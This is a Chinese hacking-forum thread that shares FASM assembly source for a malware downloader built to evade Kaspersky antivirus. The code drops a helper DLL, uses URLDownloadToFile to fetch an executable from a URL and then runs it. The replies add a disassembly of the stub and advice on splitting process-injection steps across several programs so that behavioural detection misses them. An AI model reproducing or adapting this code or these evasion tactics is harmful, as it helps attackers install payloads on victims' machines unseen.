[原创]URLDownloadToFile下载者过卡吧启发
文章作者:洋洒信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
停电停得心情郁闷,没车没得心情郁闷,无聊ing。
内容
如题.不加密.过卡吧.还有别的,自己看去.
.会释放一个impdll.dll然后下载127.0.0.1/Msg.exe并运行
很简单的方法[所以不说了.自己看下文件就知道了].只是没见什么人用过罢了,又无聊,所以贴出来.喜欢的人玩玩..
下面是Exe的代码.
[code] format PE Gui at $52330000
include '%include%\win32ax.inc'
section '.4s' code readable executable writeable
entry $
mov ebx,$52330000
callw FindResource,ebx,impdll,RT_RCDATA
add bx,word[eax]
mov ebp,dword[eax+4]
callw CreateFile,szPath,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_NEW,FILE_ATTRIBUTE_NORMAL,NULL
callw WriteFile,eax,ebx,ebp,esp,esp,eax,eax
pop eax
callw CloseHandle
xor ebx,ebx
push ebx ebx szLocFile szNetFile NULL
callw LoadLibrary,szPath
add eax,$1060
call eax
callw ShellExecute,ebx,ebx,szLocFile,ebx,ebx,SW_SHOW
callw ExitProcess,ebx
;---------------------------------------data---------------------------------------
szPath db '.\impdll.dll',0
szNetFile db 'http://127.0.0.1/Msg.exe',0
szLocFile db 'Msg.exe',0
data resource
_file 5001,impdll,'1.dll'
end data[/code]
dll的代码很简单就一个
[code]jmp dword [UrlDownloadtofile][/code]
都打包在附件里了 其实这种方法两年前就有人用过了 你可以看一下邪八[ 开源代码收集]里的一篇帖子:
三种语言的下载者源代码:C Delphi Vb (另外还有一个我写的C#版本的)
[url]http://forum.eviloctal.com/read-htm-tid-30957.html[/url]
先用URLDownloadToFile下载一个文件到本地然后ShellExecute之 JMp???这个对付卡巴还有用吗 [quote]引用第1楼delphiscn于2008-01-30 17:36发表的 :
其实这种方法两年前就有人用过了 你可以看一下邪八[ 开源代码收集]里的一篇帖子:
三种语言的下载者源代码:C Delphi Vb (另外还有一个我写的C#版本的)
[url]http://forum.eviloctal.com/read-htm-tid-30957.html[/url]
先用URLDownloadToFile下载一个文件到本地然后ShellExecute之[/quote]
这个 貌似一楼没有看清.
并非两个函数下载文件
不知你喜欢看武侠小说没?
将无毒的花和无毒的香放在一起便成了剧毒
我要说的是 将这上面的反过来 [quote]引用第2楼erguo于2008-01-30 21:28发表的 :
JMp???这个对付卡巴还有用吗[/quote]
问题不在这里.
你还是下载附件看看吧
.
将原本被杀的东东分成两部分.
一下子就倒下一片杀软了.
国产av还在特征码杀毒.实在不该.. 之前简单逆向过一个下载者就用的你这个方式,好像叫天使下载者。 不过我还是喜欢用WinInet下载或者WinHTTP这样免杀效果更好。 52331000 . 34100000 dd 00001034 ; 结构 'IMAGE_IMPORT_DESCRIPTOR'
52331004 . 00000000 dd 00000000
52331008 . 00000000 dd 00000000
5233100C . 28100000 dd 00001028
52331010 . 3C100000 dd 0000103C
52331014 . 00000000 dd 00000000 ; 结构 'IMAGE_IMPORT_DESCRIPTOR'
52331018 . 00000000 dd 00000000
5233101C . 00000000 dd 00000000
52331020 . 00000000 dd 00000000
52331024 . 00000000 dd 00000000
52331028 . 75 72 6C 6D 6>ascii "urlmon.dLL",0
52331033 00 db 00
52331034 . 44100000 dd 00001044 ; 为 'urlmon.dLL'导入查找表
52331038 . 00000000 dd 00000000
5233103C > . 8B791342 dd urlmon.URLDownloadToFileA
52331040 00000000 dd 00000000
52331044 . 3352 dw 5233
52331046 . 55 52 4C 44 6>ascii "URLDownloadToFil"
52331056 . 65 41 00 ascii "eA",0
52331059 . 00 db 00
5233105A >/$ 31C0 xor eax, eax
5233105C |. 40 inc eax
5233105D \. C2 0C00 retn 0C
52331060 > $- FF25 3C103352 jmp dword ptr [<&urlmon.URLDownloadT>; urlmon.URLDownloadToFileA
52331066 . 00000000 dd 00000000 ; 结构 'IMAGE_EXPORT_DIRECTORY'
jmp dword ptr [<&urlmon.URLDownloadT>; urlmon.URLDownloadToFileA fasm~顶~很少看到有fasm的代码出现,就为了这个我也要顶~
新年新气象,,,
说到过行为检测。最好的方法就是多样的工作分开做
举个例子。。。
1.exe,2.exe,3.exe
1.exe负责远程进程申请
2.exe负责写远程代码
3.exe负责创建远程线程
一个任务多个进程完成。。。规则判断是判断一个进程的规则
如果我们分工合作的话。。。AV就未必有这么好的AI技术了~~ [quote]原帖由 [i]Anskya[/i] 于 2008-2-4 14:55 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=137976&ptid=32099][img]http://forum.eviloctal.com/images/common/back.gif[/img][/url]
fasm~顶~很少看到有fasm的代码出现,就为了这个我也要顶~
新年新气象,,,
说到过行为检测。最好的方法就是多样的工作分开做
举个例子。。。
1.exe,2.exe,3.exe
1.exe负责远程进程申请
2.exe负责写远程代码
3.exe负责创建 ... [/quote]
不错不错. 可惜我不喜欢把文件分太多份了..
方法这样就对了 .:lol
页:
[1]